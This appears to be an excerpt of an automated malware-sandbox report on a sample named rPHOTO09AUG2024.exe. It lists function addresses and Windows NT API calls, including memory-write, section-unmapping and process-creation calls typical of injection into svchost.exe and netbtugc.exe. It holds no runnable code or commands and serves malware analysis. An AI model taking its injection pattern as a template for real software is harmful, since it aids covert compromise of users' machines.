Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_02E52CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52C60 NtCreateKey,LdrInitializeThunk,	4_2_02E52C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_02E52C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_02E52DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52DD0 NtDelayExecution,LdrInitializeThunk,	4_2_02E52DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_02E52D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_02E52D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E535C0 NtCreateMutant,LdrInitializeThunk,	4_2_02E535C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E539B0 NtGetContextThread,LdrInitializeThunk,	4_2_02E539B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52AB0 NtWaitForSingleObject,	4_2_02E52AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52B80 NtQueryInformationFile,	4_2_02E52B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52EA0 NtAdjustPrivilegesToken,	4_2_02E52EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52E30 NtWriteVirtualMemory,	4_2_02E52E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52FA0 NtQuerySection,	4_2_02E52FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52F90 NtProtectVirtualMemory,	4_2_02E52F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52F60 NtCreateProcessEx,	4_2_02E52F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52CF0 NtOpenProcess,	4_2_02E52CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52CC0 NtQueryVirtualMemory,	4_2_02E52CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52C00 NtQueryInformationProcess,	4_2_02E52C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52DB0 NtEnumerateKey,	4_2_02E52DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52D00 NtSetInformationFile,	4_2_02E52D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E53090 NtSetValueKey,	4_2_02E53090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E53010 NtOpenDirectoryObject,	4_2_02E53010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E53D70 NtOpenThread,	4_2_02E53D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E53D10 NtOpenProcessToken,	4_2_02E53D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02387A70 NtReadFile,	4_2_02387A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02387B50 NtDeleteFile,	4_2_02387B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02387BE0 NtClose,	4_2_02387BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02387920 NtCreateFile,	4_2_02387920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02387D30 NtAllocateVirtualMemory,	4_2_02387D30

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DA40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_00DA40B1

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D98858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00D98858

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DA545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00DA545F

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D4E800	0_2_00D4E800
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D6DBB5	0_2_00D6DBB5
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DC804A	0_2_00DC804A
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D4E060	0_2_00D4E060
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D54140	0_2_00D54140
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D62405	0_2_00D62405
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D76522	0_2_00D76522
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D7267E	0_2_00D7267E
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DC0665	0_2_00DC0665
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D56843	0_2_00D56843
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D6283A	0_2_00D6283A
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D789DF	0_2_00D789DF
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DC0AE2	0_2_00DC0AE2
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D76A94	0_2_00D76A94
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D58A0E	0_2_00D58A0E
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DA8B13	0_2_00DA8B13
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D9EB07	0_2_00D9EB07
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D6CD61	0_2_00D6CD61
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D77006	0_2_00D77006
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D53190	0_2_00D53190
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D5710E	0_2_00D5710E
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D41287	0_2_00D41287
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D633C7	0_2_00D633C7
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D6F419	0_2_00D6F419
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D616C4	0_2_00D616C4
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D55680	0_2_00D55680
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D678D3	0_2_00D678D3
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D558C0	0_2_00D558C0
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D61BB8	0_2_00D61BB8
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D79D05	0_2_00D79D05
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D4FE40	0_2_00D4FE40
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D61FD0	0_2_00D61FD0
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D6BFE6	0_2_00D6BFE6
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_010835E0	0_2_010835E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416871	2_2_00416871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416873	2_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028A0	2_2_004028A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410173	2_2_00410173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401110	2_2_00401110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1F3	2_2_0040E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401290	2_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403500	2_2_00403500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040268A	2_2_0040268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402698	2_2_00402698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026A0	2_2_004026A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF4A	2_2_0040FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D753	2_2_0042D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF53	2_2_0040FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA352	2_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038003E6	2_2_038003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C02C0	2_2_037C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C8158	2_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038001AA	2_2_038001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730100	2_2_03730100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F81CC	2_2_037F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764750	2_2_03764750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373C7C0	2_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375C6E0	2_2_0375C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03800591	2_2_03800591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F2446	2_2_037F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EE4F6	2_2_037EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FAB40	2_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F6BD7	2_2_037F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373EA80	2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03756962	2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380A9A6	2_2_0380A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374A840	2_2_0374A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03742840	2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E8F0	2_2_0376E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037268B8	2_2_037268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40	2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760F30	2_2_03760F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E2F30	2_2_037E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03782F28	2_2_03782F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374CFE0	2_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732FC8	2_2_03732FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BEFA0	2_2_037BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740E59	2_2_03740E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FEE26	2_2_037FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FEEDB	2_2_037FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752E90	2_2_03752E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FCE93	2_2_037FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DCD1F	2_2_037DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374AD00	2_2_0374AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373ADE0	2_2_0373ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03758DBF	2_2_03758DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740C00	2_2_03740C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730CF2	2_2_03730CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0CB5	2_2_037E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372D34C	2_2_0372D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F132D	2_2_037F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0378739A	2_2_0378739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E12ED	2_2_037E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375B2C0	2_2_0375B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037452A0	2_2_037452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372F172	2_2_0372F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377516C	2_2_0377516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374B1B0	2_2_0374B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380B16B	2_2_0380B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F70E9	2_2_037F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF0E0	2_2_037FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EF0CC	2_2_037EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037470C0	2_2_037470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF7B0	2_2_037FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F16CC	2_2_037F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7571	2_2_037F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DD5B0	2_2_037DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03731460	2_2_03731460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FF43F	2_2_037FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFB76	2_2_037FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B5BF0	2_2_037B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0377DBF9	2_2_0377DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375FB80	2_2_0375FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B3A6C	2_2_037B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFA49	2_2_037FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7A46	2_2_037F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EDAC6	2_2_037EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DDAAC	2_2_037DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03785AA0	2_2_03785AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E1AA3	2_2_037E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03749950	2_2_03749950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375B950	2_2_0375B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D5910	2_2_037D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AD800	2_2_037AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037438E0	2_2_037438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFF09	2_2_037FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03703FD2	2_2_03703FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03703FD5	2_2_03703FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFFB1	2_2_037FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03741F92	2_2_03741F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03749EB0	2_2_03749EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F7D73	2_2_037F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F1D5A	2_2_037F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03743D40	2_2_03743D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375FDC0	2_2_0375FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B9C32	2_2_037B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FFCF2	2_2_037FFCF2
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_0621C5C8	3_2_0621C5C8
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_0621C616	3_2_0621C616
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_06224C96	3_2_06224C96
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_06224C94	3_2_06224C94
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_0621E596	3_2_0621E596
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_0621E36D	3_2_0621E36D
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_0623BB76	3_2_0623BB76
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe	Code function: 3_2_0621E376	3_2_0621E376
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EA02C0	4_2_02EA02C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EC0274	4_2_02EC0274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EE03E6	4_2_02EE03E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E2E3F0	4_2_02E2E3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDA352	4_2_02EDA352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EB2000	4_2_02EB2000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ED81CC	4_2_02ED81CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EE01AA	4_2_02EE01AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EA8158	4_2_02EA8158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E10100	4_2_02E10100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EBA118	4_2_02EBA118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E3C6E0	4_2_02E3C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E1C7C0	4_2_02E1C7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E20770	4_2_02E20770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E44750	4_2_02E44750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ECE4F6	4_2_02ECE4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ED2446	4_2_02ED2446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EE0591	4_2_02EE0591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E20535	4_2_02E20535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E1EA80	4_2_02E1EA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ED6BD7	4_2_02ED6BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDAB40	4_2_02EDAB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E4E8F0	4_2_02E4E8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E068B8	4_2_02E068B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E22840	4_2_02E22840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E2A840	4_2_02E2A840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E229A0	4_2_02E229A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EEA9A6	4_2_02EEA9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E36962	4_2_02E36962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDEEDB	4_2_02EDEEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E32E90	4_2_02E32E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDCE93	4_2_02EDCE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E20E59	4_2_02E20E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDEE26	4_2_02EDEE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E2CFE0	4_2_02E2CFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E12FC8	4_2_02E12FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E9EFA0	4_2_02E9EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E94F40	4_2_02E94F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E62F28	4_2_02E62F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E40F30	4_2_02E40F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EC2F30	4_2_02EC2F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E10CF2	4_2_02E10CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EC0CB5	4_2_02EC0CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E20C00	4_2_02E20C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E1ADE0	4_2_02E1ADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E38DBF	4_2_02E38DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E2AD00	4_2_02E2AD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EBCD1F	4_2_02EBCD1F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EC12ED	4_2_02EC12ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E3B2C0	4_2_02E3B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E252A0	4_2_02E252A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E6739A	4_2_02E6739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E0D34C	4_2_02E0D34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ED132D	4_2_02ED132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ED70E9	4_2_02ED70E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDF0E0	4_2_02EDF0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ECF0CC	4_2_02ECF0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E270C0	4_2_02E270C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E2B1B0	4_2_02E2B1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EEB16B	4_2_02EEB16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E5516C	4_2_02E5516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E0F172	4_2_02E0F172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ED16CC	4_2_02ED16CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDF7B0	4_2_02EDF7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E11460	4_2_02E11460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDF43F	4_2_02EDF43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EBD5B0	4_2_02EBD5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ED7571	4_2_02ED7571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ECDAC6	4_2_02ECDAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E65AA0	4_2_02E65AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EBDAAC	4_2_02EBDAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EC1AA3	4_2_02EC1AA3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E93A6C	4_2_02E93A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDFA49	4_2_02EDFA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02ED7A46	4_2_02ED7A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E95BF0	4_2_02E95BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E5DBF9	4_2_02E5DBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E3FB80	4_2_02E3FB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EDFB76	4_2_02EDFB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E238E0	4_2_02E238E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E8D800	4_2_02E8D800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E29950	4_2_02E29950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E3B950	4_2_02E3B950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02EB5910	4_2_02EB5910
